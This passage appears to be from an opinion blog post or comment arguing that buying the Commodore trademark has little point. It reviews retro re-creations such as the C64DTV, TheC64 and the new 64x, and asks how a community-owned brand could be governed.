No points for guessing how much of an impact those made. And none of this is really specific to Commodore, either: look at the shambling corpse of Atari SA, made to dance on decaying strings by the former Infogrames' principals. I mean, cryptocurrency and hotels straight out of Blade Runner — really? The exception to the rule was the 2004 C64DTV, a Tulip-licensed all-in-one direct-to-TV console containing a miniaturized and enhanced Commodore 64 designed by Jeri Ellsworth in a Competition Pro-style joystick. It played many built-in games from flash storage but more importantly could be easily modded into a distinct Commodore computer of its own, complete with keyboard and IEC serial ports, and VICE even emulates it. It sold well enough to go through two additional hardware revisions and the system turned up in other contemporary DTVs (like the DTV3 in the Hummer DTV game). There are also the 2019 "TheC64" machines, in both mini and full-size varieties (not affiliated), which are pretty much modern direct-to-TV systems in breadbin cases that run built-in games under emulation. The inclusion of USB "Comp Pro" styled joysticks is an obvious secondary homage to the C64DTV. Notably, Retro Games Ltd licensed the Commodore 64 ROMs from Cloanto but didn't license the Commodore trademark, so the name Commodore never appears anywhere on the box or the machine (though you decide if the trade dress is infringing). The remnant of the 64x was its case moulds, which were bought by My Retro Computer Ltd in the UK after Commodore USA LLC went under and that's where this story picks up, selling an officially licened new version of the 64x (also not affiliated) after Commodore Corporation BV granted permission in 2022. This new 64x comes in three pre-built configurations or as a bare case. By buying out the Commodore name they would get to sell these without the (frankly exorbitant) fees CC BV was charging and extend the brand to other existing Commodore re-creations like the Mega 65, but the video also has more nebulous aims, such as other retro Commodore products (Jeri Ellsworth herself appears in this video) or something I didn't quite follow about a Commodore charity arcade for children's hospitals, or other very enthusiastically expressed yet moderately unclear goals. I've been careful not to say there's no point in buying the Commodore trademark — I said there's not much. There is clearly a market for reimplementing classic Commodore hardware; Ellsworth herself proved it with the C64DTV, and current devices like the (also not affiliated with any) Mega 65, Ultimate64 and Kawari VIC-II still sell. But outside of the retro niche, Commodore as a brand name is pretty damn dead. Retro items sell only small numbers in boutique markets. Commodore PCs and Commodore smartphones don't sell because the Commodore name adds nothing now to a PC or handset, and the way we work with modern machines — for better or worse — is worlds different than how we worked with a 1982 home computer. No one expects to interact with, say, a Web page or a smartphone app in the same way we used a BASIC program or a 5.25" floppy. Maybe we should, but we don't. Furthermore, there's also the very pertinent question of how to steward such a community resource. The effort is clearly earnest, genuine and heartfelt, but that's not enough without governance. Letting these obviously hobbyist projects become full-fledged members of the extended Commodore family seems reasonable and even appropriate, but then there's the issue of preventing the Shenzhen back alley cloners from ripping them (and you) off. Plus, even these small products do make some money. What's FRAND in a situation like this? How would you enforce it? Should you enforce it? Does everyone who chips in get some fraction of a vote or some piece of the action? If the idea is only to allow the Commodore name to be applied to projects of sufficient quality and/or community benefit, who decides? Better to let it rest in peace and stop encouraging these bloodsuckers to drain what life and goodwill remain in the Commodore name. The crap products that came before only benefited the licensor and just make the brand more tawdry. CC BV only gets to do what it does because it's allowed to. TheC64 systems sold without the Commodore trademark because it was obvious what they were and what they do; Mega 65s and Ultimate64s are in the same boat. Commodore enthusiasts like me know what these systems are. We'll buy them on their merits, or not, whether the Commodore name is on the label, or not (and they will likely be cheaper if they don't). CC BV reportedly has been trying to sell off the trademark for awhile, which seems to hint that they too recognize the futility. Don't fall into their trap.

a week ago 11 votes